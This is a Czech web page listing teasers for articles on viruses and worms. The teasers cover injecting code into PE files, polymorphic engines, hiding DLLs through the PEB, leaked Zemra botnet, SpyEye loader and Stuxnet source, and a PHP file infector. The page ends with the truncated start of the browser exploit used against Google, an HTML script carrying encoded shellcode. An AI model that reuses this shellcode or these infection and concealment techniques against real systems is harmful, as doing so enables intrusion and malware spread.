Virus & Worms

Články o virech a červech šířících se sítí

Nebojme se upravovat PE soubory I.

Cílem následujícího seriálu je popsat techniky úpravy PE kódu. V prvním díle se seznámíme s nezbytnou strukturou PE souboru a popíšeme si, jak vytvořit v souboru novou sekci pomocí editoru, a jak zajistit vykonání našeho kódu uloženého v této sekci.

Seznamte se – Morfismy (oligomorfismus, polymorfismus, metamorfismus)

„Nový malware XYZ využívá velmi pokročilý polymorfní engine. Antivirová společnost ABC je schopna ho detekovat s přesností 20%.“ Pojmy jako polymorfismus a metamorfismus se staly denním chlebem všech IT specialistů, bezpečnostních konzultantů i řadových programátorů. Máme polymorfní viry, polymorfní exploity, polymorfní packery (Občas mám pocit, že i komentáře ve fórech a diskuzích jsou polymorfní :) ) Ale jen málokdo dokáže skutečně vysvětlit rozdíl mezi jednotlivými morfismy.

Kód botnetu Zemra unikl na internet

Zemra botnet je poměrně nový kód vytvořený v jazyce C# určený primárně pro DDoS útoky.

Skrývání DLL knihoven v běžícím procesu s využitím struktury PEB

Autoři malware mají snahu ukrývat své výtvory nejen před zraky uživatelů, ale taktéž i před ‘zraky’ různých analyzérů a detektorů. Důvod je zřejmý: Udržet svůj kód co nejdéle neviditelný znamená jeho vyšší životnost. K tomuto účelu autoři nejen oprašují a renovují již dříve známé techniky, ale vyvíjejí i nové. Jednou ze starších technik je skrývání modulů v běžícím procesu s využitím struktury PEB.

Zdrojové kódy loaderu bankeru SpyEye ke stažení

Zdrojové kódy loaderu obcházející zabezpečení velkého konkurenta a nástupce notoricky známého ZeuS trojanu s názvem SpyEye se objevily ke stažení na www.mirrorcreator.com. Kódy údajně poskytla skupina Reverse Engineers Dream Crew (RED Crew).

Zdrojové kódy červa Stuxnet ke stažení

Zdrojové kódy notoricky známého červa Stuxnet v podobě dumpu z Hex-Rays ke stažení na www.megaupload.com.

"Greedy bee" – Jednoduchý infektor PHP souborů

"Greedy bee" je jednoduchý infektor PHP skritů, vytvořený v PHP. Vznikl jako PoC pro pár lidí, které zajímalo, jakým způsobem se masově infikují webové stránky na hostinzích.

Link:

Exploit použitý k útoku na korporátní síť Googlu

UPDATE

<html><script>
var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805

Syndikovat obsah